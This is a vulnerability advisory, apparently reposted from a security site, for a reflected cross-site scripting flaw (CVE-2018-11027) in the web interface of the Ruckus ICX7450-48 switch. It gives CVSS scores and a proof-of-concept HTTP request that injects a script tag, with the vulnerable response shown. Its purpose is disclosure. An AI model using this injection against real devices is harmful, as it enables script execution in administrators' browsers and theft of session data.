Ruckus (Brocade) ICX7450-48 Reflected Cross Site Scripting

2018.05.28
Credit: Yavuz Atlas
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

I. VULNERABILITY ------------------------- Ruckus (Brocade) ICX7450-48 Reflected Cross Site Scripting II. CVE REFERENCE ------------------------- CVE-2018-11027 III. VENDOR HOMEPAGE ------------------------- https://www.ruckuswireless.com IV. DESCRIPTION ------------------------- Ruckus (Brocade) ICX7450-48 web application has a reflected cross-site scripting vulnerability. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. V. PROOF OF CONCEPT ------------------------- Request: GET /<script>alert(1)</script> HTTP/1.1 Host: 10.10.10.10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Response: <html> <head> <title>Object Not Found</title> </head> <body> <h1>Object Not Found</h1> The requested URL '/<script>alert(1)</script>' was not found on the asdf_ICX.<p> Return to <a href="">last page</a><p> </body> </html> VI. CREDIT ------------------------- Yavuz Atlas - @yavuzatlas_ http://www.biznet.com.tr -- Bu mesaj ve ekleri, mesajda gAPnderildiAi belirtilen kiAi/kiAilere APzeldir ve gizlidir. Bu mesaj herhangi bir amaASS iASSin ASSoAaltA+-lamaz, daAA+-tA+-lamaz ve yayA+-nlanamaz. MesajA+-n gAPnderildiAi kiAi deAilseniz, mesaj iASSeriAini ya da eklerini kopyalamayA+-nA+-z, yayA+-nlamayA+-nA+-z ya da baAka kiAilere yAPnlendirmeyiniz ve mesajA+- gAPnderen kiAiyi derhal uyararak bu mesajA+- siliniz. Airketimiz, mesajA+-n iASSeriAinin ve eklerinin size deAiAikliAe uArayarak veya geASS ulaAmasA+-ndan; gizliliAinin korunmamasA+-ndan; virA1/4s iASSermesinden ve bilgisayar sisteminize verebileceAi herhangi bir zarardan sorumlu deAildir. This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in anyway to your computer system based on this message.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top